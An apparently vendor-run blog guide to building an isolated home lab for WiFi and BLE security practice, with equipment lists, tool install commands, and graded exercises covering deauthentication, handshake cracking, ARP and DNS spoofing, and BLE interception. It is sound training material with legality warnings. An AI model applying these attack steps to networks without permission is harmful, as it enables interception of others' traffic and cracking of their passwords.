Home Lab

Setting Up a Home Lab for Wireless Security Testing

Table of Contents

Practicing wireless security techniques on networks you do not own is illegal. A home lab gives you a legal, controlled environment to learn and experiment. You set up your own networks, attack your own devices, and break things without consequences.

This guide covers building an affordable, practical home lab for WiFi and BLE security testing - from the minimum equipment needed to a more comprehensive setup for serious research.

Why You Need a Lab

Reading about wireless attacks is not the same as doing them. You need hands-on practice to understand timing, troubleshoot tools, and develop intuition for what works and what does not. A lab lets you:

  • Practice attacks safely and legally
  • Test tools without risking production networks
  • Experiment with different configurations and defenses
  • Build muscle memory with security tools
  • Prepare for security certifications (OSCP, CEH, WiFi-specific certs)
  • Test your own products' wireless security

You do not need expensive equipment. A basic lab costs under $150, and most of the components you may already have.

Lab Components

graph TD
    subgraph "Attacking Machine"
        A["Laptop with Kali Linux"] --> B["USB WiFi Adapter\n(Monitor Mode)"]
        A --> C["BLEShark Nano\n(WiFi + BLE)"]
        A --> D["Bluetooth Adapter\n(for BLE MITM)"]
    end
    subgraph "Target Network"
        E["Test Router\n(WPA2/WPA3)"] --> F["Client Device 1\nSmartphone"]
        E --> G["Client Device 2\nLaptop/Pi"]
        E --> H["IoT Device\n(optional)"]
    end
    subgraph "BLE Targets"
        I["BLE Peripheral\n(ESP32/Arduino)"] --> J["GATT Server\nCustom Services"]
        K["Smart Device\n(Light, Lock, Sensor)"] --> L["Companion App"]
    end
    subgraph "Isolation"
        M["Lab Router NOT\nConnected to Internet"] --> N["Separate from\nHome Network"]
    end

Home lab architecture - attacking machine, target network, BLE targets, all isolated from your home network

At minimum, you need:

  1. A test router - A cheap WiFi router dedicated to the lab
  2. An attacking machine - A laptop running Kali Linux (VM or bare metal)
  3. A WiFi adapter - A USB adapter that supports monitor mode
  4. A client device - Something connected to the test router (old phone, Raspberry Pi)

Optional but valuable additions:

  • BLEShark Nano for WiFi and BLE testing from a pocket device
  • BLE peripherals (ESP32 dev boards, smart home devices) for BLE research
  • Additional routers for testing different configurations
  • A managed switch for wired attack practice

Setting Up the Test Router

Any old WiFi router works. You can often find them for under $20 at thrift stores or online. The specific model does not matter much, but look for:

  • WPA2 support (nearly universal)
  • WPA3 support (if you want to test modern security)
  • 2.4 GHz and 5 GHz bands
  • Admin interface for configuration

Router configuration for lab use:

  1. Factory reset the router
  2. Set the SSID to something identifiable: "LAB_NETWORK"
  3. Set WPA2-PSK with a known password (you will be cracking this)
  4. Disable WPS (or enable it to practice WPS attacks)
  5. Set a static channel instead of auto (makes monitoring easier)
  6. DO NOT connect the WAN port to anything - keep it isolated

Consider running multiple SSIDs with different security configurations:

  • "LAB_WPA2" - WPA2-PSK with a simple password (for handshake practice)
  • "LAB_WPA2_STRONG" - WPA2-PSK with a complex password (for wordlist testing)
  • "LAB_OPEN" - Open network (for MITM practice)

If your router supports OpenWrt firmware, flash it. OpenWrt gives you far more control over wireless settings, lets you run packet captures on the router itself, and exposes settings that stock firmware hides.

The Attacking Machine

A laptop running Kali Linux is the standard. See our guide on setting up a pentesting VM for details.

For wireless testing specifically, bare-metal Kali (dual-boot or dedicated laptop) performs better than a VM because you avoid USB passthrough overhead. An older ThinkPad (T480, T450) running Kali makes an excellent dedicated pentesting machine for under $200.

Essential tools to have installed:

# WiFi tools
sudo apt install aircrack-ng wireshark hashcat hcxdumptool hcxtools

# Network tools
sudo apt install nmap bettercap ettercap-graphical

# BLE tools
sudo apt install bluez bluetooth btscanner
pip install bleak   # Python BLE library

# General
sudo apt install python3-scapy tcpdump

The BLEShark Nano supplements the laptop as a portable testing platform. Use it for quick WiFi scanning and handshake capture when you do not want to set up the laptop, then transfer captures to Kali for analysis and cracking.

Client Devices

You need something connected to the test network to practice against. Options:

Old smartphone (best option): Connect it to the lab WiFi network. It generates realistic traffic, supports WPA2/WPA3, and can run apps for BLE testing. An old Android phone with developer mode enabled is ideal.

Raspberry Pi: A Pi connected to the lab network can run as a web server, SSH server, or general client. You can also use it as a secondary attack machine.

# Set up a simple web server on the Pi for testing
python3 -m http.server 80

Old laptop: Any laptop with WiFi can be a target device. Run it with Windows for practicing Windows-specific attacks, or Linux for more flexibility.

The client device's job is to be connected to the test router so you have a legitimate connection to deauthenticate, handshakes to capture, and traffic to intercept.

BLE Test Targets

For BLE security testing, you need BLE peripherals to scan, connect to, and test.

ESP32 dev board (best for learning): An ESP32 running a simple GATT server gives you a controllable BLE peripheral. You write the firmware, so you know exactly what the device does and can introduce deliberate vulnerabilities for testing.

// Simple Arduino BLE peripheral for testing
#include <BLEDevice.h>
#include <BLEServer.h>

void setup() {
    BLEDevice::init("LAB_BLE_DEVICE");
    BLEServer *server = BLEDevice::createServer();
    BLEService *service = server->createService("12345678-1234-1234-1234-123456789abc");
    BLECharacteristic *characteristic = service->createCharacteristic(
        "abcdefab-1234-1234-1234-abcdefabcdef",
        BLECharacteristic::PROPERTY_READ | BLECharacteristic::PROPERTY_WRITE
    );
    characteristic->setValue("Hello Lab");
    service->start();
    server->getAdvertising()->start();
}

void loop() { delay(1000); }

Smart home devices: Cheap BLE smart bulbs, sensors, or plugs make realistic targets. Many use minimal or no authentication, making them perfect for practicing BLE attacks with tools like GATTacker.

The BLEShark Nano itself is a BLE device that you can scan and interact with from your laptop using tools like bettercap or custom Python scripts with the bleak library.

Network Isolation

This is critical. Your lab network must be isolated from your home network and the internet.

Physical isolation (simplest): Do not connect the lab router's WAN port to anything. The lab network exists only between the router and the devices connected to it. No internet access, no connection to your home network.

VLAN isolation (more advanced): If you have a managed switch, create a separate VLAN for lab traffic. This lets you share physical infrastructure while maintaining logical separation.

Why isolation matters:

  • ARP spoofing attacks affect the entire broadcast domain - if your lab is on your home network, you will disrupt your own traffic
  • Deauthentication attacks affect all clients on the channel - if neighbors use the same channel, you will deauth their devices too
  • Running exploit tools on a shared network risks accidentally targeting the wrong systems
  • Some attacks generate a lot of traffic that can slow down the entire network

Channel selection: Set your lab router to a channel that is not used by your home network or neighbors. Use a WiFi analyzer app to find the least congested channel. On 2.4 GHz, channels 1, 6, and 11 are non-overlapping. On 5 GHz, there are many non-overlapping channels.

Lab Exercises

Once your lab is set up, here are progressive exercises to build skills:

Level 1 - Reconnaissance:

  1. Scan for networks with airodump-ng
  2. Identify the test router's BSSID, channel, and encryption
  3. List connected clients
  4. Capture probe requests from client devices
  5. Scan with the BLEShark Nano and compare results

Level 2 - WPA Handshake Capture and Cracking:

  1. Set the lab router password to something in rockyou.txt
  2. Capture a handshake using deauthentication
  3. Convert to hashcat format with hcxpcapngtool
  4. Crack with hashcat using dictionary and rules
  5. Try PMKID capture (no deauth needed)

Level 3 - Network Attacks (after connecting to lab network):

  1. Run nmap to discover devices on the network
  2. Perform ARP spoofing with bettercap
  3. Capture traffic from the client device
  4. Run DNS spoofing to redirect traffic
  5. Set up a captive portal

Level 4 - BLE Testing:

  1. Scan for BLE devices with the BLEShark Nano
  2. Enumerate GATT services with bettercap or a Python script
  3. Read and write BLE characteristics
  4. Set up GATTacker for BLE MITM
  5. Analyze BLE traffic in Wireshark

Level 5 - Defense Testing:

  1. Enable WPA3 on the router and test attack resistance
  2. Enable 802.11w (Protected Management Frames) and test deauth resistance
  3. Set up a wireless IDS (like Kismet) and detect your own attacks
  4. Test BLE devices with Secure Connections pairing

Scaling Your Lab

As your skills grow, expand the lab:

Multiple routers: Set up routers with different security configurations (WPA2, WPA3, WPA2-Enterprise with a RADIUS server). Practice attacking each and note the differences.

RADIUS server: Set up FreeRADIUS on a Raspberry Pi for WPA2/WPA3-Enterprise testing. This lets you practice EAP attacks and certificate-based authentication.

Wireless IDS: Run Kismet on a dedicated device to detect attacks. This teaches you both offense and defense simultaneously.

Multiple attack machines: Run different operating systems and toolsets. Compare airodump-ng with Kismet, hashcat with JtR, bettercap with ettercap.

IoT lab: Collect cheap IoT devices (smart bulbs, sensors, cameras) for testing. Many have poor security and make interesting targets for research.

Shiver mesh network: If you have multiple BLEShark Nano devices, set up a Shiver mesh network and practice attacks against mesh communications. The mesh uses ESP-NOW with a 20-50m range between nodes.

Budget Breakdown

Minimum viable lab:

Component Cost Notes
Old WiFi router $10-20 Any WPA2-capable router
USB WiFi adapter $30-70 AR9271 for budget, RTL8812AU for dual-band
Old smartphone $0-30 Any old Android phone
Laptop $0+ Use existing, or $150-200 for a used ThinkPad
Total minimum $40-120

Enhanced lab:

Component Cost Notes
Everything above $40-120
BLEShark Nano $36.99+ Portable WiFi + BLE testing
ESP32 dev board $5-10 BLE test target
Raspberry Pi $35-60 Client device, RADIUS server
Second router $10-20 Different security configs
Smart BLE device $10-20 Realistic BLE target
Total enhanced $140-270

A home lab is an investment in skills. The cost of equipment is minimal compared to the practical knowledge you gain by working through real attacks and defenses in a controlled environment. Start small, practice the basics, and expand as your skills grow.

This article is for educational purposes. Always practice on equipment you own. Never test wireless security on networks or devices without explicit written permission.

Get the BLEShark Nano - $36.99+
Back to blog

Leave a comment